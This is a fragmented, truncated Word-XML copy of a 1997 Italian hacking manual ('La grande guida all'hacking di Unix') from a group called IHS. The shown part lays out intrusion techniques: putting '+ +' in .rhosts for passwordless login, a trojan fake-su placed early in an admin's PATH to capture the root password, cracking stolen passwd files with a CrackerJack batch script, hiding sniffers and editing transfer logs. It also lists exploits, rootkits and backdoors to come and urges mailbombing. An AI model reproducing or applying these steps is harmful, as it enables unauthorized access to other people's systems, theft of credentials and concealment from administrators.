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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">L A  I H S  P R E S E N T A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 A  G R A N D E  G U I D A  A L L ' H A C K I N G  D I  U N I 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 xml:space="preserve">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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Versione 1.0b di Novembre '97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critto e tradotto da Lord KasKo &amp; Turbo Snail di Italian Hacking Servic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!!!!!ATTENZIONE!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!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a IHS non e' responsabile di danni prodotti a persone o cose causat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ell'applicazione delle informazioni contenute nella guida. La guida e' al sol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copo informativ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!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!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RODUZIONE DELLA IH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iao Ragazzi e benvenuti nel fantastico mondo dell'hacking. Mancavano propri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elle guide in italiano, vero? Ebbene, noi della IHS abbiamo voluto scrive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esto manuale in modo da far avvicinare le persone a questo mondo. Questa guid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' un insieme di conoscenze personali, di altri testi e di quant'altro. Speriam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i aver fatto un buon lavoro e se avete qualche commento scriveteci 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rdkasko@freeweb.essenet.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Vogliamo ringraziare Invisible-Evil per la sua bellissima guida da qui abbiam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ratto spunto, a noi per essere hacker e a tutti quelli che ci appoggiano, com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Jader del sito Zona d'Ombra (http://www.abnet.it/zo/index.htm), ed altri hack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me InfectedMachine e tutti quelli di SystemDown, gli unici italiani che hann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vuto le palle di venir fuori facendo un'ottima rivista. Forza ragazzi !!!!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UCK! a tutti quelli che utilizzano le loro capacita' informatiche per crea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asino nella nostra comunita', quelli che distruggono siti per il piacere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arl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UCK! a chi utilizza internet per intraprendere traffici di bambini e ch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ostiene i pedofili!!! Invitiamo, come hanno fatto i colleghi di SD, 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struggere con mailbomb siti pedofili oppure avvisare le autorita'..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fine salutiamo te e ti auguriamo una buona lettura...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ta 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ESTO DOCUMENTO CONTIENE DEL CODICE IN C - FATE IN MODO DI NON SALVARE NESSUN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ODIFIC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avete altri Exploits,bugs, sniffers o utility che non sono presenti in ques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esto,per favore inviate una E-Mail a : lordkasko@freeweb.essenet.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 questo modo potremo mantenervi costantemente aggiornati sulle ultime version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questo toolkit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lenco dei contenuti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vvis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efazion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I - I comandi Unix da conoscere assolutament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A. Comandi basilar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ritornare alla propria Home directo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raggiungere facilmente la Home directory di un uten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vedere in quale directory ci si trov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ottenere un manuale completo di ogni comand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B. Tel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ermessi dei file Uni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Gruppi Uni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cambiare permessi e grupp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C. Rlog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.rhos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preparare un file .rhost per fare login senza passwo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D. FT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llegarsi al sito,ma mai al di fuori di ess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so di prompt, hash e b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so di get, put, mget e mpu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E. GCC (compilatore unix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inserire un file in un sistema senza doverlo uploada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copiare dei file nella propria Home directory in modo semplic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compilare dei programmi in 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rinominare a piacere i programmi in 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caricare dei programmi in background mentre ci si sta scollegand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ntrollare i processi usando p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II - Come iniziare (il vostro primo account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A.  Come crackare i file delle passwo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me ottenere centinaia di account col vostro primo 'hacked account'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Perche'avete davvero bisogno di una password crackata in un siste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me ottenere la paasword di root in un sistema non espugnab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Usare un falso programma SU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Documentazione sul falso programma su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me ottenere la password del Sysad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me leggere .bash_histo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racker jack - un buon password crack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me usare Cracker jac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File vocabolari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sa serve per inizia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Modificare il file vocabolari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Hash file da usare con Cracker Jack e il vostro file vocabolari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Hash file da usare con Cracker jack e il vostro file di Passwo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B. Parlando con dei Novellin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trovare i novellin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ottenere le loro passwo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C. La strada piu' complicat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sare finger @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ove potrebbe essere la password?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Ottenere maggiori informazioni da fing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n piccolo file .c da usare se avete fatto progress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Scrivere un piccolo Script in Perl che fa il lavoro al vostro pos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ottenere una domain list di tutti i domini da rs.internic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Uno Script in Perl per scomporre i domini e porli in ordine in una list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eggib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eseguire lo script in Per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2D. Usare mount per ottenere l'accesso ai sistemi Uni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s'e'nfs m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Di cosa si necessita per inizia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me verificare che in un sistema si possa fare il mount dei driv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Uno script per cercare sistemi sui quali sia possibile fare nfs m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me fare il mount del siste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me fare l'unmount del siste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Una dimostrazione dal ver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Mounting del driv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Vedere le directory dell'uten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Editare il Password file della macchina loca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me mettere un file .rhosts nelle directory degli uten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me fare rlogin negli account degli uten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III - Come ottenere il file delle Passwor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A. PH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s'e'il ph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sare lynx o Netscape per accedere al ph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Trovare lo user id tramite WW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vedere se si e'root tramite ph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trovare il file delle password con ph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Fare una copia di backup del password file delle vitti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ambiare la password di un utente con ph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ipristinare le vecchie passwor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n file .c per inviare comandi al phf dalla vostra she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usare il file di shell di ph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n altro modo di usare il phf - Testo di Quantu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BindWarez file by Quantu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no script perl che prova OGNI domain su Internet e fa il log degli access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di root e recupera i password file per voi tutto il giorno rimanendo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backgroun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ocumentazione per lo script appena citat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Ottenere degli account da /var/?/messag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no script per ottenere le password se si ha accesso a /var/?/messag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B. Novellin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3C. Ottenere i file shadow passw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s'e'una shadow passw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Ottenere il file shadow senza l'account di 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n file .c per recuperare qualunque file senza l'account di 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D. Raggiungere /etc/hos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er quale motivo andare in /etc/hos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IV - Guadagnare l'account di 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sa fare se non si riesce ad ottenere l'accesso di root nel siste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4A. Bug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ntroduzion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4B. Exploi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'exploit tramite mount/unm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sa sono i SUID perm'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l file .c per l'unm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compilare unomunt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Exploit di Linux tramite lp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File .c per l'exploit di Linux tramite lp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l file .c per l'exploit con lpr (versione per BSD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usare lp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Guardare i proprietari del gruppo con lp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sate lpr per la prima root,poi fate una SUID she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ottenere una SUID root shell per futuri accessi di root (root root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'Exploit con splitv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ogramma .c per l'exploit con splitv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usare il programma splitvt per l'explo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o script di shell per l'exploit di root con Sendmail 8.73 - 8.83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usare l'exploit con sendmail per ottenere root acces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V - Renditi invisib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ntenere l'access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5A. Zap2 (per wtmp/lastlog/utmp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Fare finger all'host prima di log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Fare login e stare al sicur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Come configurare Zap2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Trovare la locazione del log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l programma zap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5B. Altri scrip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'editor wted per w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fare chmod al file wtmp.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copiare il file wtmp.tmp in w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Settare il path per il file wtmp in wt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l file wted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ulire il lastlog con ll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iga di comando per ll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usare ll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Come fare chmod al file lastlog.tmp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copiare il file lastlog.tmp in last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Settare il path per il file lastlog in ll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l file lled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n buon script perl per editare i file wtmp,utmp e controllare i process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VI - Eliminare i log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6A. Un giro in un sistema hacka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ogghiamoci nel siste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erchiamo l'adm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irectory nidifica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eparare il file di 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iventare invisibil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Fare il grep della directory dei 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Sniffare la re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Editare il file linsniffer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are un'occhiata ai processi che giran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pilare e chiamare il programma di sniffin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niziare una sessione di snif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ambiare gli accessi ai file del grupp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alizzare un trojan suid root shell per avere uid=0 gid=0 ogni volt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hiamare il Troja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Modificare la data dei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ntrollare il log file dello sniff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Svuotare il contenuto degli history files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sare unset per gli history fil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6B. Messaggi e sys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trovare i logs usando /etc/syslog.con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Come vedere se ci sono logs nelle directory nascost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vedere se i logs vengono postati agli account degli uten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vedere se i logs stanno andando su di un'altra macchin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editare syslog.conf per nascondere i log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iavviare syslog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vedere se c'e'un log segreto di su leggendo /etc/login.def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6C. xferlog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editare xfer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greppare ed editare i logs ww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cercare i logs ft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Altri modi per editare i testi dei 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sare grep -v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no script per ricavare linee di testo da questi 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iavviare syslog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6D. I crontab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trovare e leggere i crontabs di root o dell'adm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vedere se MD5 e settato sulla macchin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s'e'MD5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VII - Mantenere l'accesso alla macchin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7A. Trucchi e segre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Quando vieni beccato dall'adm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sa aspettarsi dall'adm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History fil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irectory nidifica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nserire dei Troja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irectory nascos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reare nuovi comandi (trojans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Aggiungere o cambiare delle parti del passwd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Modificare alcuni admin account con password nul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l miglior modo di aggiungere un acc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Editare un account vuoto in modo da potersi logga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nstallare alcuni giochi o programmi exploitab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me conoscere il tuo adm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eggere la mail di sistema (senza aggiornare i puntatori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sa cercare nella directory della ma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n programma per leggere la posta senza aggiornare i puntator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7B. Backdoor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7C. Root Kits e troja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sa sono i Root k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sa sono i Demon k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osa fanno i troja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 Appendice I - Cosa fare dopo un accesso                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La Check list dalla a alla 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 Appendice II - Siti Hacking / Security WWW / ftp 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 Appendice III - FILES UUENCODATI                      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. Quantum's Bindwarez -File binari per PH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. Demon Root Kit - Include: Banish, DemonPing, DemonSu, DemonTel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. Linux Root Kit - Include: Login, Netstat, and, P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4. Programma Fake SU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vviso!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' vero, questo manuale aiutera' gli hackers ad entrare nei sistemi ma e' d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nsiderarsi anche come una guida per i Sysadm per affrontare i problem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iguardanti la sicurezza e per conoscere quali siano gli elementi d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ntrollare in modo da tenere fuori gli hacker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usi questo manuale per guadagnare l'accesso ad un qualunque sistema al qua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n appartieni e danneggi una sua qualsiasi parte sei punibile a norma di legg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n sto dicendo di entrare nei sistemi, sto soltanto dicendo qualcosa della mi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perienza e delle cose che farei se entrassi dentro al mio stesso sistem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a e' solo una informazione .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efazion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k, cominciamo. Se hai intenzione di fare dell'hacking, devi farlo per un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agione. Tutti gli hackers hanno una ragione per farlo. La maggior parte ha sol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te di sapere. La maggior parte di cio' che so l'ho imparata in qualche servic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vider o sulla macchina di qualcun altr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ono uno che punta molto sull'esperienza persona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avessi dovuto studiare cio' che so, avrei dovuto leggere 20000 libri solo p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apere qualcosa su alcuni file di configurazione, sui messaggi email degl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mministratori, sui file .bash_history e qualcos'altro su alcuni altri sistem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i in questo manuale dovresti imparare come essere un "hacker completo"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viluppare un tuo stile. Non ci vorra' molto ma ci vorra' un po' di esperienz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ma di poterti considerare davvero un hack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n basta sapere crackare un file di password ed entrare in una macchina unix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er considerarti un hacker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k, sai come ottenere l'accesso di root in un sistema! Non sei ancora un hacker!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rima devi sapere perche' sei un hacker e poi avere un tuo stile e una tu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ilosofia. Ci vuole uno scopo ed una ragione per entrare in qualunque sistema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l vero hacker sa perche' sta facendo qualcosa, e lo fa per ragioni come i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apere, l'informazione, e l'ACCESSO. Il vero hacker trasformera' un hack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ccessi a molti diversi sistemi e provider e manterra' questi accessi p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noscenze future e per maggiori informazioni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Gli hacker da quattro soldi non saranno invisibili e faranno molte sciocchezz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me: cancellare e corrompere dati, fare cadere le macchine, lanciare dei bot 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ei client IRC dagli account di root o dare a tutti le password che ha cracka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er far sapere a tutti che sa fare dell'hacking. O potrebbere fare sciocchezz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he lo portera' ad essere beccato. Penso che talvolta questo venga fatto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roposito per attirare su di se' l'attenzione in modo da essere beccato e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nnunciare che sono hacker, e che c'era anche lui!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vero Hacker non cerca questo tipo di gloria, vuole l'accesso e vuo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antenerlo ed essere invisibile! Non dira' a molti amici riguardo il sistema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n dara' in giro le password o gli account e terra' gli altr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uori in modo da mantenere l'accesso e tenerlo il piu' possibile puli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i in questo manuale spero di aver messo abbastanza stile in modo che tu poss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vvero interessarti a quest'opera e diventare cosi' un vero buon hacker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APPY HACKING!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andi unix da conosce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i sono solo pochi comandi basilari da imparare, e poi anche alcuni programm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ix che ti aiuteranno a collegarti, a penetrare nel sistema o a mantene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accesso ad una macchin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hiama il tuo Internet Provider locale e chiedi loro uno shell account in mod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a poter imparare e fare della pratica su questi comandi base. Un norma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ccount di shell non e' in genere car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1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andi basilar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pero tu abbia una conoscenza di base del DOS, che ti aiutera' un po' e partiro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 questo presupposto durante la stesura di questo manua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 sinistra ci sono i comandi DOS, a destra i corrispettivi comandi UNIX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ICORDA: Unix e'case-sensitive, cosi' se qui si usa il minuscolo devi farl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nche tu; se io uso lo spazio lo devi fare anche tu. Dos ti lascera' passa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ante di queste cose: unix NO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/W      = l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        = ls -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/AH     = ls -al  AH=(hidden) -al=(include anche i file nascosti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ENAME     = mv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TTRIB     = chmo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D         = mkdi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D         = rmdi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L        = r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PY       = c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esti sono i comandi di base, ti suggerisco di guardare il manuale di ciascun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i questi comandi direttamente dalla shell unix. Lo puoi fare digitando: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an comand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iascuno di questi comandi ha dgli switch, come cp -R per copiare file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irectory. Cosi' dovresti scrivere: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n cp per vedere tutti gli switch che puoi usare con il comando di copi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d (poi premi INVIO) ti portera' sempre alla tua home directo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p nomefile $HOME copiera' il file nella direcory hom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d ~nomeutente ti portera' nella Home directory di quell'utente, sempre che tu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vi abbia access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wd (premi INVIO) ti dira' in quale directory ti trov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1B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el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-------------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elnet e'un comando che puoi usare da un account di shell, o da un file ex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(telnet.exe) da Windows, OS/2 e Windows 95 e altri OS che permettono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llegarsi ad altre macchine sulla rete. Ci sono altri programmi ch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oscerai qui, come FTP e rlogin che puoi usare ma ora useremo telne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uoi usare telnet se conosci l'indirizzo IP o il nome dell'host al quale vuo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llegarti. Per usare il comando ti serve solo il programma telnet p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llegarti all'IP o all'host in questo mod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elnet netcom.com  oppure  telnet 206.146.43.56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, e ora il logi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elnet machine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ying ..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nected to machine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inux 2.0.28 (machine.com) (ttyp0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chine login:userna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word:######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tuo prompt potrebbe apparire differente, ma noi useremo ques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ta qui sopra che ti verra' detto quale OS gira sulla macchina a cui ti se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llega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uoi usare questo se raccogli una vasta collezione di passwd file. Prima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iziare a crackarli, ordinali per tipo di O/S facendo soltanto il telnet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odo da sapere che sistema usan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i sono altri modi, ma manteniamo questo argomento ancora per un attimo,telnet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omain.name.com ,dopo aver visto cosa gira su di una macchina prendi nota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emi CTRL J per chiudere la connession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etti insieme tutti i tuoi file di passwd in un solo pile che dovrai cracka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er primo.. Tutto cio' che serve e' un account che funziona per quel sistema,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aremo quasi certi che otterremo i permessi di root su quella macchina! Ci son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almente tanti buchi in linux da pensare di non poter penetrare in una di quel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cchine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, ora possiamo entrare nel meraviglioso mondo dell'hackin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messi dei file Uni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 cd /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 ls -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otal 783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x------   1 wood     users           1 Jan 25 18:28 19067ha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--r--   1 berry    mail            1 Jan 16 12:38 filter.14428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------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598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------   1 rhey19   root       395447 Jan 24 03:00 pop3a1360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4 root     root         1024 Jan 12 13:18 screen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rima cosa: dobbiamo usare lo slash ( / ) al posto del back-slash ( \ ) p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ccedere alla directory tmp! Unix usa / per la root directory, al contrario de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S che usa appunto il simbolo \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ta che abbiamo usato ls -l per la directory nel formato "a tutta pagina". S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vessimo usato 'ls' avremmo ottenuto cio' che c'e'qui sot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 l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067haa      filter.14428  pop3a13598    pop3a13600    screen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 quello che vediamo qui non possiamo dire molto, cosi' perlopiu' useremo ls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l con -al vedremo anche i file hidden, le directory e i file nascost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izieranno sempre con '.'. Ora guard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 ls -a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otal 794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wxrwt   4 root     root         8192 Jan 25 23:05 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22 root     root         1024 Dec 28 18:07 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--r--   1 berry    users           6 Jan 25 23:05 .pinetemp.00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berry    users        1024 Jan 25 23:05 .te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x------   1 wood     users           1 Jan 25 18:28 19067ha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--r--   1 berry    mail            1 Jan 16 12:38 filter.14428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------   1 rhey19   root       395447 Jan 24 02:59 pop3a13598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------   1 rhey19   root       395447 Jan 24 03:00 pop3a1360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4 root     root         1024 Jan 12 13:18 screen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.pinetemp.000 e'un hidden file, and .test e'una directory hidde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--r--   1 berry    mail            1 Jan 16 12:38 filter.14428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ga 1       riga2     riga3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ra abbiamo bisogno di imparare qualcosa sui permessi, sugli utenti e su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rupp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 riga #1 indica i permessi del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 riga #2 indica chi e'il proprietario del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 riga #3 indica il gruppo di appartenenza del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 permessi dei file sono raggruppati in 3 gruppi divers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la linea comincia con una d, e'una directory, se non c'e'la d, e'un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 --- --- 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| |   |   |--------&gt; Other = Chiunque accede alla macchin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| |   |------------&gt; Group = alcuni gruppi possono acced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| |----------------&gt; User  = Solo il proprietario puo' acced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|------------------&gt; Marcatore della Directory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 rw- r-- r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| |   |   |--------&gt; 'Other' puo' solo leggere i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| |   |------------&gt; 'Group' puo' solo leggere il fi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| |----------------&gt; 'User' puo' scrivere il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|------------------&gt; Non e' una directo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 rwx rwx r-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| |   |   |--------&gt; 'Other' puo' leggere ed eseguire il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| |   |------------&gt; 'Group' puo' leggere ed eseguire il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| |----------------&gt; 'User'  puo' scrivere ed eseguire il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|------------------&gt; Non e' una directo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l proprietario e' l' 'user name' nella riga #2 e il group name e'il nome nel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iga #3. Nel DOS i file hanno l'estensione .exe, .com, o .bat per gl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seguibili, ma in unix basta la --x nel tuo gruppo 'user', 'other'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'group'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uoi cambiare questi permessi se sei il proprietario del file o se sei ROOT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mod oug+r filename dara' accesso in lettura del file a tutti e tre i grupp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hmod og-r filename rendera' il file leggibilie solo dall'utente che possiede i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le. (nota che - o + settano il valore di verita' del parametro del file)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mod +x filename rendera' il file eseguibile da tutt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own username filename rendera' il file di proprieta' di un altro uten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grp groupname filename rendera' il file di proprieta' di un altro grupp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tai attento a non cambiare i permessi dei file o ti butteranno fuori da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istema. Cambiare le configurazioni del sistema potrebbe solo far saltare alt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unzioni, cosi' tieni lontane le zampe se non vuoi farti beccare!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ai solo cio' di cui sei *SICURO*. Usa solo comandi che conosci, potrest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trovarti a  trascorrere ore a fare un fix di questo tip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own -R username /* Potrebbe tenerti impegnato per un anno! :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i basta stare attento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pprofondiremo le conoscenze di questo stuff quando sevira'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zione 1C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log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'e' un altro comando che puoi usare e che approfondiremo altrove quando direm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e usare rlogin per loggarsi ad un sistema senza una passwor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 ora leggi il manuale di rlogin usando man rlogin dalla tua shell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comando base sara'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login -l username hostna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necting.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word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login necessita che l'utente abbia un file nella home che dica da quale sistem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 puo' fare rlogin. Questo file .rhosts dovrebbe apparire cosi'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ername hostname (or) hostna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aggiungi  + + a questo file, lascera' entrare chiunque da qualunque host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nza passwor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file dovrebbe apparire cosi'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 cut here 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+ +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_____ cut here ------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ci sono gia' delle entry potresti aggiungere + + sotto i loro host names, m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icorda che ora noteranno che possono entrare con rlogin senza password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vresti prendere di mira persone che non hanno ancora un file .rhos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zione  1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T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altro modo di fare login e'con FTP. Puoi usare un client windows, o anch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are login da una shell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tp ftp.domain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ti permettera' di fare upload e download dal sito su cui fai hack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icordati di editare il xferlog (vedi la sezione 6d) per coprire le tue tracc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el sistema. RICORDA! Non devi MAI fare ftp o telnet fuori dal sistema in cu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i penetrato, lavora solo all'interno! Se provieni dal tuo stesso sistema, o d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altro account hacked forse stai dando la tua login e la tua password a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ysadm o ad un altro hacker su quel sistema. Ci potrebbe essere un troja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elnetd o ftpd caricato nel sistema, o anche uno sniffer, Ora potresti aver da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 qualcuno la tua login e password. E se quel qualcuno e'il sysdam, potrebb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nsare che la vendetta e'dolce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ando ftp da shell, ti suggerisco alcuni comandi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opo esserti loggato, scrivi al prompt i seguenti comandi premendo enter dop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iascuno di ess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mp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rompt permettera' di usare comandi del tipo (mget *) o (mput *) e trasferi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intera directory senza che ti venga chiesta la conferma per ciascun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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>hash mark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hash mostrera' ########### sullo schermo cosicche' si possa vedere la velocita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l trasferimen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bin ti garantira' di ricevere i file nel modo giusto, e se si sta trasferendo u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le binario potra' essere decompress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 comandi di trasferimento sono semplici, get filename, o , put filename, o p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olti file puoi usare wild cards con mput e mge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1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pilatore GC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i sara' un momento in cui avrai bisogno di compilare un file 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' meglio compilarlo sulla macchina in cui stai lavorando. Cosi' fai l'upload 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sa 'Copia e Incolla' sull'hacked box e compila li' il sorgente. Sei ha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blemi con il loro compilatore prova a fare l'upload del file precompila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modo di inviare il file sulla macchina vittima dovrebbe essere quello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sare 'copy &amp; paste'. Trova un buon tsr o uno shareware per windows per fa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io' se adesso non hai nessun modo per farlo. Puoi copiare lo script da un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inestra all'altra dentro ad un editor della macchina vittima e in questo mod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n ci sara' nessun log del download di file asci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er copiare e incollare puoi provare ad aprire un editor sull'hacked box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piare dall'altra sessione, e poi incollare lo script nell'editor e salvare i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le. In questo modo non ci sara' ancora nulla nello xferlog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uoi fare la stessa cosa col file di password. Se decidi di scaricare il fi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lle password con ftp, ricorda di copiarlo nella tua Home con un nome divers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bash:/etc:&gt; cp passwd $HOME/plog  copiera' il file chiamato passwd dal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irectory /etc in cui ti trovi alla tua Home in un file chiamato plog invece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w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 SySaDm greppano i xferlogs alla ricerca di chi sta scaricando il file del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wor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altro modo di inviare/ricevere file all'/dall' hacked box senza comparire ne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ogs e'di aprire una sessione IRC sulla macchina vittima, poi dall'altr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ssione nella quale sei gia' un utente su IRC, inviare un file usando DCC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comando per inviare i file e'/dcc send &lt;nick&gt; &lt;file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arebbe comodo se tu avessi un bot caricato su IRC quando stai facend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ell'hacking cosi potresti inviare i file al bot e lasciare che li ricev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utomanticament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'bot' e'un programma robot che puoi caricare in background nello shel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ccount e si occupera' di ricevere file,tenere i canali aperti,etc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Compilatore GCC e'semplice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cc filename.c -o nomechevuo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stessi per compilare un programma chiamato z2.c che cancella i file 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criverei questo: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cc z2.c -o za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tterrei un file eseguibile chiamato za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scrivi solo gcc z2.c otterrai un file chiamato a.out, questo e'l'eseguibile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 puo' rinominare ad esempio come Zap col comand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v a.out Za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ra ci sara' un file chiamato Zap che sara' eseguibile invece di a.ou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Vorrai essere sicuro di non chiamare un file con un nome identificabile da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YSadm: se hai uno sniffer chiamato linuxsniffer.c, in fase di compilazione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arebbe meglio cambiare il nome. Ad esempi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cc linuxsniffer.c -o ls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icorda anche che a volte per eseguire questi file direttamente nella directory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vrai scrivere soltanto il nome del file seguito da &lt;Enter&gt;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 volte potrebbe non funzionare a meno che tu preceda con  ./ il nom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ell'eseguibile, cioe'lsn diverrebb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./ls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 volte avrai bisogno di far girare in background un programma anche dopo i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ogoff, come nel caso appena citato dello sniffer. In questo caso potresti vol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hiamare lo sniffer con un nome difficilmente identificabile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allo secondo il tuo stile. MA per farlo rimanere in background mentre non siam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gati devi lanciare il comando seguito da &a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sn&a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digiti solo lsn, lo schermo si blocchera' e non potrai scrivere mentre fai l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niffing ma se scrivi lsn&amp; lo sniffer verra' caricato e avrai di nuovo i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mp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l sistema ti fara' sapere che e'stato caricato dandoti il # del process i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ssegnato al programm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uoi vedere i processi con il comando ps -x ,potresti voler lanciare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s -auxe |mo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= a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= show us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x= your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= env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 alcune macchin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=tre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 il comando: pstre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I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iziamo! (il tuo primo account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i sono molti modi per ottenere un account per iniziare. Trattero' ciascu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rgomento per aiutarti a iniziare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utto cio' che ti serve e' un buon account da cui tirarne fuori a centinaia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nsaci; Potenzialmente ogni macchina linux e' un buon sistema espugnabile.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ra hai un accesso di root e carichi uno sniffer. Lo sniffer TCP cerchera' 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rocessi di login alla rete e fara' il log della login e della password per ogn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elnet, ftp, o connessione dial-in che viene fatta verso l'esterno o vers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interno del sistem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nche se e'una piccola connessione ethernet, ci sono in giro un centinaio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assword per poche macchine o domini. Se e'un net provider piu' ampio otterra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entinaia di account in tutto il mondo. Tutto cio' che ti serve e'un buon accout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 una password per un sistema da espugnare.  Se sembra che non si possa fa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'exploit alla root, potrebbe essere un buon sistema in cui crackare le passwor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 scambiare gli account per altri account con hackers o utenti di IRC che stann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ercando di caricare un bot ma che non hanno un account di shell o spazio su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sco per farl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AI scambiare anche una sola password di un sistema del quale hai ottenu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ccesso di root. Tieniti questi sistemi per te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ra vediamo come fare per ottenere il tuo primo accoun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ction 2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racking sul phile di passw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erche'continuare a crackare passowrd per un sistema del quale puoi ottene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munque la maggior parte delle password in 24 ore? Non solo per qull'hacked box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a per tutte le altre macchine a cui e'collegato. Se il sistema non e' espugnabile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n sprecarci tempo, vai sul prossimo! Piu' avanti potrai scambiare le passwor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e hai cracka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ottieni un account di administrator crackato potresti voler leggere i suoi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history-files e vedere se di solito usa il comando su per accedere molto a root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e'cosi' puoi usare un Trojan su di lui. Questo scoprira' per te la passwor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roo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unziona cosi': cambi il suo script di shell in modo che ci sia una directory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ascosta (.term) va bene,che sia settata nel path prima di tutte le altre. Mett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fake-su in .term (o un altra directory). L'Admin digita 'su', tutto sembr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unzionare, digita la password di root la password e'copiata in un log file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/tmp/.elm69, e il trojan su si cancella e riporta un errore di password dicend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i provare ancora. L'admin pensa di aver sbagliato qualcosa e lancia di nuov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, ma ora tutto e' ok e riesce a loggars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overai il fake su  nell'ultima appendice chiamata 'file uuencodati'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ake Su by Nfin8 - i-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RC: /msg i-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,2,3...ecco fatto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1. Cambia il path in uno degli user account nei quali hai verificato tramite gl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history-file che il proprietario usa SU,inserisci in testa al path la directory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ve il trojan  SU file si trova. .term o .elm andranno bene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2. Assicurati di editare l'inizio del file su.c per mettere il path dove il fi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i trovera' una volta compilato,in modo da potersi auto-cancellare e lascia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sto al vero SU per il secondo tentativ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3. Metti tutti i file nella directory target e compila su.c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cc su.c -o su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ra cancella tutti i file eccetto su. Fatto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.bash_profile divrebbe assomigliare a quest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.bash_pro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Get the aliases and function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[ -f ~/.bashrc ]; the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. ~/.bashr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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>f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User specific environment and startup program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TH=$PATH:$HOME/b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NV=$HOME/.bashr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ERNAME="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xport USERNAME ENV PAT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mbia la prima riga in: PATH=$HOME/.term:$PATH:$HOME/b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ando il sysadm lancia 'SU' lancera' il trojan nella directory .term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iportera' il messaggio che la password digitata e'errata, il Trojan SU avra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esso un file hidden nella directory  /tmp per te che contiene la password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oot (o la password dell'account)  che e'stata digitata. Se e'un account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iuttosto che root potrai sapere il nome dell'account. Poi il trojan su s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ncellera' in modo che la volta successiva si avviera' il vero SU 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uoi trovare la password dell'amministratore nella sezione iniziale del file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word nella directory /etc. Digita: more passw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uoi stare certo che i primi due account reali che si trovano nel password fi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ono degli amministratori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 volte ne puoi trovare altre nelle rispettive directory che sono indicate ne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asswd file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e /staff/usernam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Gli History file sono in ciascuna directory di user account. Puoi leggerli p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vedere quali sono gli ultimi comandi digitati dall'utente. Qualche volta anch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iu' di 100 comandi. Cerca il file .bash_history, o History,puoi leggerli co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mando more. more .bash_history, oppure spesso puoi usare more .b* oppu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crivere more .b (e poi premere il tasto TAB sulla tastiera)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k, ora ti serve un buon programma per crackare le password. Nel prossim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apitolo scoprirai come ottenere il file di passwd nei sistemi in cui possie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 account, ma ti serve comunque un programma di cracking delle password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i servono 3 cos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. Programma per il cracking delle passwo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. Un buon word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3. Un file di passwor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(N.B. il phile di passwd deve essere il piu' possibile aggiornato, altriment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ischiate di perdere del tempo con password che sono gia' state cambiate da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prietari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l migliore programma di passwd cracking dovrebbe essere CRACKERJACK (anche Joh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he Ripper funziona davvero bene!) Entrambi possono essere cercati facilmente su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Web. Scarica,ad esempio, crackerjack. Se sei un po' piu' esperto puoi scarica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a versione di cjack per unix e lanciarlo in una shell. Ma se stai iniziando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rca la versione per DOS/OS2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rca anche un buon Word file. I migliori contengono nom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roverai che le password meno sicure sono i nomi delle ragazze degli utenti o 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mi dei ragazzi delle utenti ;)) Troverai wordfile del tipo 'familynames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'babynames' 'girlsnames' 'boysnames' 'commonpasswords' Hackersdict' e fi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milari dovrebbero essere una buona scelt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ncia crackerjack cosi'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D:\jack]jac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racker Jack version 1.4 for OS/2 and DOS (386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pyright (C) 1993, The Jackal, Denmar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Wfile(s) : domain.com.passw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ordfile  : domain.com.passw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me prima cosa lancia il passwd file come wordfile. Questo ti permettera'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ttenere tutti gli account di chi usa il proprio nome come password,anche s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hanno usato altre info come il nome della loro compagnia verra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coperto subito e non dovrai aspettare la ricerca tramite word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vuoi creare un hash word file per ottenere piu' possibilita',leggi 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cumentazione di crackerjack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'hashing permette a crackerjack di cambiare il case del wordfile o anche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ggiungere numeri e lettere all'inizio o alla fine dele parole nel wordfile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me sandy1 o 1sandy. Scoprirai che molti utenti fanno questo e credono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sere piu' al sicur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uoi trovare qui dei file di hashing sia per i wordfile che per le passwd. Dop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verli analizzati vedrai come poterli modificare o crearne di nuovi a second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lla situazion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 Inizio di discthash.ba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 start of dicthash.ba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@echo of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l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THIS FILE FOR DOS MACHIN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To work this batch file have all of the crackerjack files in th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current directory with this batch file, along with your dict an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password file.  Then use this batch file using the following format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dicthash.bat dictfilename.ext passwordfilename.ex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Make sure to have the jpp.exe and jsort.exe files in your dir as well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dicthash will first load jack running the dict file against you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password file in both cases, then it will add numbers 0-9 both t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the begining and end of every dict word.  This will take a while,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so go out for that week vacation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If you get tired you can 'ctrl c' to the next option or numb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ii@dormroom.pyro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Mail me some of your hits, let me know how this works for you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lower %1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%1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dot:0 %1 | jpp -translate:.1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dot:7 %1 | jpp -translate:.1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lower -dot:0 %1 | jpp -translate:.1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lower -dot:7 %1 | jpp -translate:.1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0 %1 | jpp -translate:.2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7 %1 | jpp -translate:.2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0 %1 | jpp -translate:.2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7 %1 | jpp -translate:.2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0 %1 | jpp -translate:.3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7 %1 | jpp -translate:.3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0 %1 | jpp -translate:.3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7 %1 | jpp -translate:.3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0 %1 | jpp -translate:.4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7 %1 | jpp -translate:.4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0 %1 | jpp -translate:.4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7 %1 | jpp -translate:.4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0 %1 | jpp -translate:.5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7 %1 | jpp -translate:.5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0 %1 | jpp -translate:.5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7 %1 | jpp -translate:.5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0 %1 | jpp -translate:.6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7 %1 | jpp -translate:.6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0 %1 | jpp -translate:.6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7 %1 | jpp -translate:.6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0 %1 | jpp -translate:.7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7 %1 | jpp -translate:.7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0 %1 | jpp -translate:.7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7 %1 | jpp -translate:.7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0 %1 | jpp -translate:.8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7 %1 | jpp -translate:.8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0 %1 | jpp -translate:.8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7 %1 | jpp -translate:.8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0 %1 | jpp -translate:.9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7 %1 | jpp -translate:.9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0 %1 | 